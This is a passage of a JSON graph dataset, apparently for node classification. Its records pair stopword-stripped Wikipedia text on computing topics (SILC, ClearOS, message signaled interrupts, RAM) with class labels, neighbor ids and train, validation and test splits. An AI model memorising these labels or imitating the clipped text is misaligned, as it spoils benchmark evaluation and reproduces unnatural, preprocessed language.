private messages private messages may optionally digitally signed messages secured key material generated ske protocol previously agreed upon key material example passphrases silc provides security even silc server may compromised silc designed pekka riikonen 1996 1999 first released public summer 2000 client server written protocol specifications proposed ultimately request publication denied june 2004 iesg rfc published date present time several clients advanced official silc client irssi plugin silc protocol also integrated popular pidgin instant messaging client gui clients silky colloquy silky client put hold abandoned 18th july 2007 due inactivity several years latest news silky website client completely rewritten 2008 three silc protocol implementations written silc clients use libsilc part silc toolkit silc toolkit dual-licensed distributed gnu general public license gpl revised bsd license described silc faq chats secured generation symmetric encryption keys keys generated somewhere occurs server means chats might compromised server compromised version man-in-the-middle attack solution offered chat members generate public-private keypair asymmetric encryption private key shared chat members done band public key used encrypt messages channel approach still open compromise one members chat private key compromised share key another without agreement group silc uses similar pattern irc global silc network many small independent networks consisting one several servers although claimed silc scale better many servers single network original network called silcnet silc.silcnet.org round-robin however may 2014 one active though unstable server four several public networks known external links section however also shut due declining popularity silc",
    "neighbors": [
      10242,
      3847,
      649,
      4490,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      8758,
      10171,
      4797,
      3133,
      3006,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      8674,
      10341,
      10344,
      11112,
      367,
      8432,
      6651,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 2374,
    "label": 9,
    "text": "Transformation_language:transformation language transformation language computer language designed transform input text certain formal language modified output text meets specific goal program transformation systems stratego/xt txl tom dms asf+sdf transformation languages major component transformation languages systems driven declarative descriptions structure input text typically grammar allowing applied wide variety formal languages documents macro languages kind transformation languages transform meta language specific higher programming language like java c++ fortran lower-level assembly language model-driven engineering technical space model transformation languages mtls take input models conforming given metamodel produce output models conforming different metamodel example language qvt omg standard also low-level languages lx family implemented bootstrapping method l0 language may considered assembler transformation languages also high-level graphical language built upon lx called mola number xml transformation languages include tritium xslt xquery stx fxt xduce cduce haxml xmlambda flexml concepts languages typical transforms",
    "neighbors": [
      9345,
      515,
      5896,
      8973,
      6032,
      6420,
      6182,
      4519,
      5677,
      10927,
      10672,
      305,
      8262,
      4042,
      11475,
      3159,
      987,
      477,
      605,
      4064,
      10474,
      5228,
      4980,
      502,
      6775,
      3960
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2375,
    "label": 4,
    "text": "ClearOS:clearos clearos also known clearos system formerly clarkconnect operating system marketed software company clearcenter based centos red hat enterprise linux designed use small medium enterprises network gateway network server web-based administration interface positioned alternative windows small business server clearos succeeds clarkconnect software built clearfoundation support services purchased clearcenter clearos 5.1 removes previous limitations mail dmz multiwan functions clearos 6.1 release distribution full-featured operating system gateway network servers built source packages red hat enterprise linux features include",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      561,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      2134,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      2228,
      9909,
      4790,
      4279,
      10425,
      2239,
      9407,
      7364,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      3885,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      3486,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      975,
      9689,
      2010,
      9693,
      485,
      5608,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2376,
    "label": 5,
    "text": "SIP_trunking:sip trunking sip trunking enables end point ’ pbx phone exchange system send receive calls via internet sip applied signalling protocol multiple real-time application sip trunk able control voice video messaging applications also voice internet protocol voip technology streaming media service based session initiation protocol sip internet telephony service providers itsps deliver telephone services unified communications customers equipped sip-based ip pbx unified communications facilities unified communications applications provide voice video streaming media applications desktop sharing web conferencing shared whiteboard architecture sip trunking provides partitioning unified communications network two different domains expertise interconnection two domains must occur sip trunk interconnection two domains created transport via internet protocol ip involves setting specific rules regulations well ability handle services protocols fall name sip trunking itsp responsible applicable regulatory authority regarding following law obligations public domain private domain instead nature subject particular constraints law may either responsibility itsp end user enterprise third party provides voice services company domain elements perform characteristic features requested domain particular result part front-end network customer logically divided two levels private domain consists three levels",
    "neighbors": [
      5472,
      5972,
      8934,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 2377,
    "label": 2,
    "text": "Joinup_collaboration_platform:joinup collaboration platform joinup collaboration platform created european commission funded european union via interoperability solutions public administrations programme isa programme joinup launched 9 december 2011 replaced open source observatory repository osor.eu semantic interoperability centre europe semic.eu communities funded isa programme two became joinup initial communities site aims let public administrations promote e-government systems specifically offers meeting place collaborative working environment development interoperability joinup hosts communities practice community common assessment method standards specifications camss community national interoperability frameworks observatory nifo platform also raises awareness free open source software semantic interoperability public sector joinup offers catalogue open source software interoperability assets models interoperability maturity model imm target audience includes using developing implementing e-government systems site focuses european public sector projects open others platform three main functions site offers software development tools including software repository apache subversion issue tracker joinup provides access federation catalogue hosted public administrations eu member states standardisation bodies european committee standardization cen european telecommunications standards institute etsi joinup also used european commission directorate general informatics make available applications examples include circabc document management system open e-prior tool help manage electronic procurement online collection software eci help organisations gather signatures support request european commission propose legislation december 2014 isa programme added epractice community joinup platform epractice offers services professional community egovernment einclusion ehealth practitioners january 2015 opengovernment community added ec directorate general communications networks content technology detailed list potential services someone receives registering platform found list software contributions made community new version joinup currently developed one features joinup platform creation maven repositories new projects disappear joinup platform powered tailored version drupal content management framework version 6 downloaded joinup web site latest version 1.7.2 released march 15 2015 software like platform powers suitable used application lifecycle management tool software forge source code past versions found development platform done hosts running debian linux joinup platform runs 10 hosts ec datacentre luxembourg includes load balancer network-attached storage reverse-proxy main part platform three red hat linux hosts running apache webserver drupal fourth linux host running apache tomcat java server apache solr search engine apache maven build automation tools fifth linux host running apache subversion software versioning revisioning system sixth linux host running mysql relational database system seventh gnu mailman platform software used offer similar services involving public administrations regions countries australia new zealand openray platform piloted since june 2012 open technology foundation otf research organisation supporting government sector research evaluation trialling uptake open technologies standards methods 21 november 2013 semantic services federated show openray repository also 21 november 2013 government south australia announced would start piloting internal version joinup platform software test use ec open e-prior south australia test use joinup sharing re-use retrieved 2013-11-24 aim improve collaboration procurement activities openroad similar collaboration platform begun vietnam ministry science technology january 2013 joinup federation similar projects french adullact started 2002 association des développeurs et utilisateurs de logiciels libres pour les administrations et les collectivités territoriales association developers users free software governments local authorities adullact actually inspiration ec's open source observatory repository examples would spanish centro de transferencia de tecnología centre technology transfer la forja de guadalinex hosted junta de andalucia platform could also compared national information exchange model niem xml-based information exchange framework united states however niem designed develop disseminate support information exchange standards processes enable jurisdictions automate information sharing ec joinup sharing information technology joinup might even compared comprehensive knowledge archive network ckan however focuses software packages semantic assets storage distribution data spreadsheets contents databases",
    "neighbors": [
      865,
      2948,
      9353,
      3052,
      8717,
      7022,
      1363,
      756,
      4919,
      8408,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2378,
    "label": 6,
    "text": "Veritas_File_System:veritas file system veritas file system vxfs called jfs onlinejfs hp-ux extent-based file system originally developed veritas software oem agreement vxfs used primary filesystem hp-ux operating system on-line defragmentation resize support turned via license known onlinejfs also supported aix linux solaris opensolaris sinix/reliant unix unixware sco openserver vxfs originally developed unix system laboratories vxfs packaged part veritas storage foundation also includes veritas volume manager according vendor first commercial journaling file system claim taken two ways i.e. first implementation journaling file system commercial context first file system available unbundled product dan koren cited one original developers vxfs notes mailing list finished release 1.0 one year later starting development vxfs contract corporation 1990 sources agree product first released 1991 internet widely available early 1990s getting new file system deployed unix like operating systems difficult one- two-year delay release commercialization file system unusual on-disk layout vxfs versioned upgradeable file system mounted file system gone ten versions vxfs file system run single instance mode parallel access cluster mode parallel mode allows multiple servers also known cluster nodes simultaneously access file system run mode vxfs referred veritas cluster file system cluster file system provides cache coherency posix compliance across nodes data changes atomically seen cluster nodes simultaneously cluster file system shares binaries on-disk layout single instance vxfs moving cluster single instance mode straightforward",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      11363,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      10872,
      9343,
      640,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      10903,
      6297,
      11419,
      6309,
      1190,
      5286,
      10405,
      1708,
      5293,
      7344,
      8368,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      8398,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      9983,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      7955,
      6935,
      1304,
      11033,
      283,
      287,
      1825,
      6434,
      5924,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      2870,
      823,
      11065,
      6970,
      11072,
      3909,
      4431,
      5969,
      346,
      2395,
      2397,
      9569,
      10596,
      2407,
      10087,
      11638,
      6519,
      2424,
      376,
      890,
      11128,
      8572,
      7554,
      5512,
      8075,
      7565,
      6545,
      11667,
      5013,
      11675,
      11676,
      414,
      2974,
      3487,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      3520,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      6643,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 2379,
    "label": 3,
    "text": "Message_Signaled_Interrupts:message signaled interrupts message signaled interrupts msi alternative in-band method signaling interrupt using special in-band messages replace traditional out-of-band assertion dedicated interrupt lines complex implement device message signaled interrupts significant advantages pin-based out-of-band interrupt signaling message signaled interrupts supported pci bus since version 2.2 later available pci express bus non-pci architectures also use message signaled interrupts traditionally device interrupt line pin asserts wants signal interrupt host processing environment traditional form interrupt signaling out-of-band form control signaling since uses dedicated path send control information separately main data path msi replaces dedicated interrupt lines in-band signaling exchanging special messages indicate interrupts main data path particular msi allows device write small amount interrupt-describing data special memory-mapped i/o address chipset delivers corresponding interrupt processor common misconception msi allows device send data processor part interrupt data sent part memory write transaction used chipset determine interrupt trigger processor data available device communicate additional information interrupt handler example pci express separate interrupt pins instead uses special in-band messages allow pin assertion deassertion emulated non-pci architectures also use msi another example hp gsc devices interrupt pins generate interrupts writing directly processor interrupt register memory space hypertransport protocol also supports msi complex implement device message signaled interrupts significant advantages pin-based out-of-band interrupt signaling mechanical side fewer pins makes simpler cheaper reliable connector advantage standard pci connector pci express takes advantage savings msi increases number interrupts possible conventional pci limited four interrupts per card shared among cards using one message signaled interrupts allow dozens interrupts per card useful also slight performance advantage software pin-based interrupt could race posted write memory pci device would write data memory send interrupt indicate dma write complete however pci bridge memory controller might buffer write order interfere memory use interrupt could arrive dma write complete processor could read stale data memory prevent race interrupt handlers required read device ensure dma write finished read moderate performance penalty msi write pass dma write race eliminated pci defines two optional extensions support message signaled interrupts msi msi-x pci express compatible legacy interrupts software level requires msi msi-x msi first defined pci 2.2 permits device allocate 1 2 4 8 16 32 interrupts device programmed address write generally control register interrupt controller 16-bit data word identify interrupt number added data word identify interrupt platforms windows use 32 interrupts use 16 interrupts msi-x first defined pci 3.0 permits device allocate 2048 interrupts single address used original msi found restrictive architectures particular made difficult target individual interrupts different processors helpful high-speed networking applications msi-x allows larger number interrupts gives one separate target address data word devices msi-x necessarily support 2048 interrupts optional features msi 64-bit addressing interrupt masking also mandatory msi-x intel systems lapic must enabled pci pci express msi/msi-x work even uniprocessor single core systems systems msis handled writing interrupt vector directly lapic processor/core needs service interrupt intel lapics 2009 supported 224 msi-based interrupts according 2009 intel benchmark using linux using msi reduced latency interrupts factor almost three compared i/o apic delivery motherboard implementations particularly among pci pci-x bridges non-functional msi support amd-8131 serverworks pci express chipsets among problems least versions linux also observed motherboards nvidia nforce chipsets broken msi support result nvidia enabled msi support graphics card drivers first time many users nforce-based motherboards complained instability eventually traced back msi implementation motherboard users complained errors ranging relatively harmless unresponsive gpus windows vista 7 eventually recover usb devices intermittently ceasing work linux gpu tasked heavy workloads hard freezes blue screens kernel panics platforms later versions drivers blacklist platforms activate msi microsoft family operating systems windows vista later versions support msi msi-x support added longhorn development cycle around 2004 msi supported earlier versions like windows xp windows server 2003 solaris express release 6/05 added support msi msi-x part new device driver interface ddi interrupt framework freebsd 6.3 7.0 added support msi msi-x openbsd 5.0 added support msi 6.0 added support msi-x linux gained support msi msi-x around 2003 linux kernel versions 2.6.20 known serious bugs limitations implementation msi/msi-x haiku gained support msi around 2010 msi-x support added later 2013 netbsd 8.0 added support msi msi-x",
    "neighbors": [
      4695,
      3272,
      5384,
      4074,
      6184,
      2476,
      5457,
      8625,
      823,
      3294
    ],
    "mask": "Train"
  },
  {
    "node_id": 2380,
    "label": 2,
    "text": "MS-DOS_4.0_(multitasking):ms-dos 4.0 multitasking ms-dos 4.0 multitasking release ms-dos developed microsoft based ms-dos 2.0 lack interest oems particularly ibm previously gave microsoft multitasking code ibm pc dos included topview led released scaled-back form sometimes referred european ms-dos 4.0 primarily used confused pc dos 4.00 ms-dos 4.01 later contain multi-tasking features apricot computers pre-announced ms-dos 4.0 early 1986 microsoft demonstrated september year paris trade show however european oems international computers limited icl actually licensed releases software particular ibm declined product concentrating instead improvements ms-dos 3.x new joint development microsoft produce os/2 result project scaled back features promised particular oems delivered september 1987 version multi-tasking ms-dos 4.1 reported developed icl drs professional workstation pws releases made contracts fulfilled july 1988 ibm announced ibm dos 4.0 unrelated product continuing dos 3.3 3.4 leading initial conjecture microsoft might release different version number however microsoft eventually released ms-dos 4.0 ms-dos 4.01 following quickly fix issues many reported well minor improvements support new executable file format key feature release support preemptive multitasking use protected mode available 80386 processors allowed specially-written programs continue executing background mode access user input output returned foreground os reported include time-sliced scheduler interprocess communication via pipes shared memory limited form multitasking considered useful server rather workstation environment particularly coupled ms-net 2.0 released simultaneously limitations ms-dos 3.0 remained including inability use memory 640 kb contributed product lack adoption particularly light need write programs specifically targeted new environment int 21h/ah=87h used distinguish multitasking ms-dos 4.x later ms-dos/pc dos 4.x issues microsoft president jon shirley described specialized version went far saying maybe n't called dos 4.0 although clear whether always intention enthusiastic response oems would resulted true successor dos 3.x marketing positioned additional option dos 3.x workstations xenix higher-end servers multiuser systems",
    "neighbors": [
      8576,
      6787,
      6148,
      10757,
      6797,
      8976,
      3857,
      3477,
      2201,
      5406,
      10273,
      8098,
      7983,
      178,
      2355,
      8499,
      9525,
      7483,
      321,
      6596,
      8262,
      9033,
      5067,
      6476,
      9166,
      4305,
      4051,
      4441,
      1247,
      5600,
      5856,
      5220,
      8423,
      4712,
      9194,
      8301,
      499,
      5363,
      4727,
      3323,
      1148,
      8959
    ],
    "mask": "Test"
  },
  {
    "node_id": 2381,
    "label": 9,
    "text": "Graph_reduction:graph reduction computer science graph reduction implements efficient version non-strict evaluation evaluation strategy arguments function immediately evaluated form non-strict evaluation also known lazy evaluation used functional programming languages technique first developed chris wadsworth 1971 simple example evaluating arithmetic expression follows reduction sequence employs strategy known outermost tree reduction expression evaluated using innermost tree reduction yielding reduction sequence notice reduction order made explicit addition parentheses expression could also simply evaluated right left addition associative operation represented tree expression looks like term tree reduction comes represented tree think innermost reduction working bottom outermost works top expression also represented directed acyclic graph allowing sub-expressions shared trees outermost innermost reduction also applies graphs hence graph reduction evaluation outermost graph reduction proceed follows notice evaluation requires four steps outermost graph reduction referred lazy evaluation innermost graph reduction referred eager evaluation combinator graph reduction fundamental implementation technique functional programming languages program converted combinator representation mapped directed graph data structure computer memory program execution consists rewriting parts graph reducing move towards useful results concept graph reduction allows evaluated values shared first developed chris wadsworth 1971 ph.d. dissertation dissertation cited peter henderson james h. morris jr. 1976 paper “ lazy evaluator ” introduced notion lazy evaluation 1976 david turner incorporated lazy evaluation sasl using combinators sasl early functional programming language first developed turner 1972",
    "neighbors": [
      4769,
      10403,
      6536,
      10618,
      10043,
      1982
    ],
    "mask": "None"
  },
  {
    "node_id": 2382,
    "label": 4,
    "text": "IBM_4767:ibm 4767 ibm 4767 pcie cryptographic coprocessor hardware security module hsm includes secure cryptoprocessor implemented high-security tamper resistant programmable pcie board specialized cryptographic electronics microprocessor memory random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed sensitive key material never exposed outside physical secure boundary clear format ibm 4767 validated fips pub 140-2 level 4 highest level certification achievable commercial cryptographic devices ibm 4767 data sheet describes coprocessor detail ibm supplies two cryptographic-system implementations toolkits custom application development also available applications may include financial pin transactions bank-to-clearing-house transactions emv transactions integrated circuit chip based credit cards general-purpose cryptographic applications using symmetric key algorithms hashing algorithms public key algorithms operational keys symmetric rsa private generated coprocessor saved either keystore file application memory encrypted master key coprocessor coprocessor identical master key use keys performance benefits include incorporation elliptic curve cryptography ecc format preserving encryption fpe hardware ibm supports 4767 certain ibm z ibm power systems x86 servers linux microsoft windows april 2016 ibm 4767 superseded ibm 4765 discontinued ibm 4767 supported platforms listed successor 4767 ibm 4768 introduced ibm z called crypto express6s cex6s available feature code 0893 links point various relevant cryptographic standards iso 13491 secure cryptographic devices https //www.iso.org/standard/61137.html iso 9564 pin security https //www.iso.org/standard/68669.html ansi x9.24 part 1 key management using symmetric techniques https //webstore.ansi.org/recorddetail.aspx sku=ansi+x9.24-1-2017 ansi x9.24 part 2 key management using asymmetric techniques https //webstore.ansi.org/recorddetail.aspx sku=ansi+x9.24-2-2016 fips 140-2 https //nvlpubs.nist.gov/nistpubs/fips/nist.fips.140-2.pdf",
    "neighbors": [
      6797,
      10678,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 2383,
    "label": 3,
    "text": "Random-access_memory:random-access memory random-access memory ram form computer memory read changed order typically used store working data machine code random-access memory device allows data items read written almost amount time irrespective physical location data inside memory contrast direct-access data storage media hard disks cd-rws dvd-rws older magnetic tapes drum memory time required read write data items varies significantly depending physical locations recording medium due mechanical limitations media rotation speeds arm movement ram contains multiplexing demultiplexing circuitry connect data lines addressed storage reading writing entry usually one bit storage accessed address ram devices often multiple data lines said 8-bit 16-bit etc devices today technology random-access memory takes form integrated circuit ic chips mos metal-oxide-semiconductor memory cells ram normally associated volatile types memory dram modules stored information lost power removed although non-volatile ram also developed types non-volatile memories exist allow random access read operations either allow write operations kinds limitations include types rom type flash memory called nor-flash two main types volatile random-access semiconductor memory static random-access memory sram dynamic random-access memory dram commercial uses semiconductor ram date back 1965 ibm introduced sp95 sram chip system/360 model 95 computer toshiba used dram memory cells toscal bc-1411 electronic calculator based bipolar transistors commercial mos memory based mos transistors developed late 1960s first commercial dram ic chip intel 1103 introduced october 1970 synchronous dynamic random-access memory sdram later debuted samsung km48sl2000 chip 1992 early computers used relays mechanical counters delay lines main memory functions ultrasonic delay lines could reproduce data order written drum memory could expanded relatively low cost efficient retrieval memory items required knowledge physical layout drum optimize speed latches built vacuum tube triodes later discrete transistors used smaller faster memories registers registers relatively large costly use large amounts data generally dozen hundred bits memory could provided first practical form random-access memory williams tube starting 1947 stored data electrically charged spots face cathode ray tube since electron beam crt could read write spots tube order memory random access capacity williams tube hundred around thousand bits much smaller faster power-efficient using individual vacuum tube latches developed university manchester england williams tube provided medium first electronically stored program implemented manchester baby computer first successfully ran program 21 june 1948 fact rather williams tube memory designed baby baby testbed demonstrate reliability memory magnetic-core memory invented 1947 developed mid-1970s became widespread form random-access memory relying array magnetized rings changing sense ring magnetization data could stored one bit stored per ring since every ring combination address wires select read write access memory location sequence possible magnetic core memory standard form computer memory system displaced solid-state mos metal-oxide-silicon semiconductor memory integrated circuits ics early 1970s prior development integrated read-only memory rom circuits permanent read-only random-access memory often constructed using diode matrices driven address decoders specially wound core rope memory planes semiconductor memory began 1960s bipolar memory used bipolar transistors improved performance could compete lower price magnetic core memory invention mosfet metal-oxide-semiconductor field-effect transistor also known mos transistor mohamed atalla dawon kahng bell labs 1959 led development mos semiconductor memory john schmidt fairchild semiconductor 1964 addition higher performance mos memory cheaper consumed less power magnetic core memory development silicon-gate mos integrated circuit ic technology federico faggin fairchild 1968 enabled production mos memory chips mos memory overtook magnetic core memory dominant memory technology early 1970s integrated bipolar static random-access memory sram invented robert h. norman fairchild semiconductor 1963 followed development mos sram john schmidt fairchild 1964 commercial use sram began 1965 ibm introduced sp95 memory chip system/360 model 95 dynamic random-access memory dram allowed replacement 4 6-transistor latch circuit single transistor memory bit greatly increasing memory density cost volatility data stored tiny capacitance transistor periodically refreshed every milliseconds charge could leak away toshiba toscal bc-1411 electronic calculator introduced 1965 used form capacitive bipolar dram storing 180-bit data discrete memory cells consisting germanium bipolar transistors capacitors 1967 robert h. dennard ibm filed patent single-transistor mos dram memory cell using mosfet transistor first commercial dram ic chip intel 1103 manufactured 8µm mos process capacity 1kb released 1970 synchronous dynamic random-access memory sdram developed samsung electronics first commercial sdram chip samsung km48sl2000 capacity 16mb introduced samsung 1992 mass-produced 1993 first commercial ddr sdram double data rate sdram memory chip samsung 64mb ddr sdram chip released june 1998 gddr graphics ddr form ddr sgram synchronous graphics ram first released samsung 16mb memory chip 1998 two widely used forms modern ram static ram sram dynamic ram dram sram bit data stored using state six-transistor memory cell form ram expensive produce generally faster requires less dynamic power dram modern computers sram often used cache memory cpu dram stores bit data using transistor capacitor pair together comprise dram cell capacitor holds high low charge 1 0 respectively transistor acts switch lets control circuitry chip read capacitor state charge change form memory less expensive produce static ram predominant form computer memory used modern computers static dynamic ram considered volatile state lost reset power removed system contrast read-only memory rom stores data permanently enabling disabling selected transistors memory altered writeable variants rom eeprom flash memory share properties rom ram enabling data persist without power updated without requiring special equipment persistent forms semiconductor rom include usb flash drives memory cards cameras portable devices solid-state drives ecc memory either sram dram includes special circuitry detect and/or correct random faults memory errors stored data using parity bits error correction codes general term ram refers solely solid-state memory devices either dram sram specifically main memory computers optical storage term dvd-ram somewhat misnomer since unlike cd-rw dvd-rw need erased reuse nevertheless dvd-ram behaves much like hard disc drive somewhat slower memory cell fundamental building block computer memory memory cell electronic circuit stores one bit binary information must set store logic 1 high voltage level reset store logic 0 low voltage level value maintained/stored changed set/reset process value memory cell accessed reading sram memory cell type flip-flop circuit usually implemented using fets means sram requires low power accessed expensive low storage density second type dram based around capacitor charging discharging capacitor store 1 0 cell however charge capacitor slowly leaks away must refreshed periodically refresh process dram uses power achieve greater storage densities lower unit costs compared sram useful memory cells must readable writeable within ram device multiplexing demultiplexing circuitry used select memory cells typically ram device set address lines a0 ... combination bits may applied lines set memory cells activated due addressing ram devices virtually always memory capacity power two usually several memory cells share address example 4 bit 'wide ram chip 4 memory cells address often width memory microprocessor different 32 bit microprocessor eight 4 bit ram chips would needed often addresses needed provided device case external multiplexors device used activate correct device accessed one read over-write data ram many computer systems memory hierarchy consisting processor registers on-die sram caches external caches dram paging systems virtual memory swap space hard drive entire pool memory may referred ram many developers even though various subsystems different access times violating original concept behind random access term ram even within hierarchy level dram specific row column bank rank channel interleave organization components make access time variable although extent access time rotating storage media tape variable overall goal using memory hierarchy obtain highest possible average access performance minimizing total cost entire memory system generally memory hierarchy follows access time fast cpu registers top slow hard drive bottom many modern personal computers ram comes easily upgraded form modules called memory modules dram modules size sticks chewing gum quickly replaced become damaged changing needs demand storage capacity suggested smaller amounts ram mostly sram also integrated cpu ics motherboard well hard-drives cd-roms several parts computer system addition serving temporary storage working space operating system applications ram used numerous ways modern operating systems employ method extending ram capacity known virtual memory portion computer hard drive set aside paging file scratch partition combination physical ram paging file form system total memory example computer 2 gb ram 1 gb page file operating system 3 gb total memory available system runs low physical memory swap portions ram paging file make room new data well read previously swapped information back ram excessive use mechanism results thrashing generally hampers overall system performance mainly hard drives far slower ram software partition portion computer ram allowing act much faster hard drive called ram disk ram disk loses stored data computer shut unless memory arranged standby battery source sometimes contents relatively slow rom chip copied read/write memory allow shorter access times rom chip disabled initialized memory locations switched block addresses often write-protected process sometimes called shadowing fairly common computers embedded systems common example bios typical personal computers often option called “ use shadow bios ” similar enabled functions rely data bios ’ rom instead use dram locations also toggle shadowing video card rom rom sections depending system may result increased performance may cause incompatibilities example hardware may inaccessible operating system shadow ram used systems benefit may hypothetical bios used booting favor direct hardware access free memory reduced size shadowed roms several new types non-volatile ram preserve data powered development technologies used include carbon nanotubes approaches utilizing tunnel magnetoresistance amongst 1st generation mram 128 kib bytes chip manufactured 0.18 µm technology summer 2003 june 2004 infineon technologies unveiled 16 mib 16 × 2 bytes prototype based 0.18 µm technology two 2nd generation techniques currently development thermal-assisted switching tas developed crocus technology spin-transfer torque stt crocus hynix ibm several companies working nantero built functioning carbon nanotube memory prototype 10 gib 10 × 2 bytes array 2004 whether technologies eventually take significant market share either dram sram flash-memory technology however remains seen since 2006 solid-state drives based flash memory capacities exceeding 256 gigabytes performance far exceeding traditional disks become available development started blur definition traditional random-access memory disks dramatically reducing difference performance kinds random-access memory ecoram specifically designed server farms low power consumption important speed memory wall growing disparity speed cpu memory outside cpu chip important reason disparity limited communication bandwidth beyond chip boundaries also referred bandwidth wall 1986 2000 cpu speed improved annual rate 55 memory speed improved 10 given trends expected memory latency would become overwhelming bottleneck computer performance cpu speed improvements slowed significantly partly due major physical barriers partly current cpu designs already hit memory wall sense intel summarized causes 2005 document first chip geometries shrink clock frequencies rise transistor leakage current increases leading excess power consumption heat ... secondly advantages higher clock speeds part negated memory latency since memory access times able keep pace increasing clock frequencies third certain applications traditional serial architectures becoming less efficient processors get faster due so-called von neumann bottleneck undercutting gains frequency increases might otherwise buy addition partly due limitations means producing inductance within solid state devices resistance-capacitance rc delays signal transmission growing feature sizes shrink imposing additional bottleneck frequency increases n't address rc delays signal transmission also noted clock rate versus ipc end road conventional microarchitectures projected maximum 12.5 average annual cpu performance improvement 2000 2014 different concept processor-memory performance gap addressed 3d integrated circuits reduce distance logic memory aspects apart 2d chip memory subsystem design requires focus gap widening time main method bridging gap use caches small amounts high-speed memory houses recent operations instructions nearby processor speeding execution operations instructions cases called upon frequently multiple levels caching developed deal widening gap performance high-speed modern computers relies evolving caching techniques prevent loss processor performance takes less time perform computation initiated complete 53 difference growth speed processor speeds lagging speed main memory access solid-state hard drives continued increase speed ~400 mb/s via sata3 2012 ~3 gb/s via nvme/pcie 2018 closing gap ram hard disk speeds although ram continues order magnitude faster single-lane ddr4 3200 capable 25 gb/s modern gddr even faster fast cheap non-volatile solid state drives replaced functions formerly performed ram holding certain data immediate availability server farms 1 terabyte ssd storage 200 1tb ram would cost thousands dollars despite speed ram still necessity efficient computation large local data sets analytics machine learning though producing graphics video games vr",
    "neighbors": [
      9732,
      4622,
      2066,
      4114,
      9235,
      7189,
      9762,
      9767,
      8232,
      10285,
      5681,
      5682,
      4147,
      1592,
      8248,
      570,
      1083,
      11324,
      2111,
      7745,
      7748,
      8774,
      9799,
      1098,
      7243,
      6221,
      9300,
      7772,
      7774,
      3685,
      2152,
      8301,
      10351,
      1136,
      5744,
      7283,
      7284,
      7285,
      8822,
      6266,
      8315,
      7806,
      639,
      6783,
      641,
      2692,
      8842,
      3725,
      6799,
      6289,
      7833,
      1178,
      7835,
      10393,
      9377,
      675,
      8355,
      1193,
      6314,
      7857,
      3250,
      9393,
      11444,
      9911,
      3257,
      4796,
      7869,
      8898,
      2243,
      8900,
      5318,
      4811,
      1741,
      5840,
      3283,
      2261,
      8919,
      2264,
      6361,
      8409,
      9947,
      10969,
      5343,
      2273,
      2791,
      3815,
      6377,
      9960,
      4334,
      1776,
      5363,
      9461,
      8438,
      3319,
      8439,
      6393,
      3323,
      2811,
      7421,
      255,
      9983,
      5892,
      1801,
      1290,
      2825,
      780,
      2317,
      10508,
      3857,
      786,
      11539,
      11545,
      797,
      11549,
      6431,
      10016,
      2339,
      6950,
      10023,
      1832,
      8494,
      4399,
      7983,
      9006,
      306,
      7986,
      823,
      10040,
      1849,
      9022,
      11584,
      321,
      8514,
      10750,
      9044,
      344,
      1369,
      9563,
      6495,
      1376,
      7519,
      8544,
      8035,
      9057,
      3943,
      11624,
      3945,
      10091,
      9581,
      7023,
      10608,
      4465,
      6003,
      11123,
      5493,
      890,
      7039,
      3457,
      7553,
      11655,
      5000,
      6539,
      6033,
      10130,
      921,
      7579,
      9115,
      9628,
      10658,
      2979,
      9126,
      9638,
      1964,
      2476,
      8109,
      1967,
      7601,
      2994,
      8115,
      9137,
      11189,
      1463,
      7614,
      4032,
      7616,
      3010,
      3522,
      11203,
      966,
      8136,
      4046,
      9173,
      5078,
      6614,
      6616,
      9693,
      5088,
      2529,
      9188,
      5606,
      2535,
      1000,
      1515,
      3053,
      10734,
      7151,
      11248,
      6641,
      11257,
      8698,
      7166,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 2384,
    "label": 4,
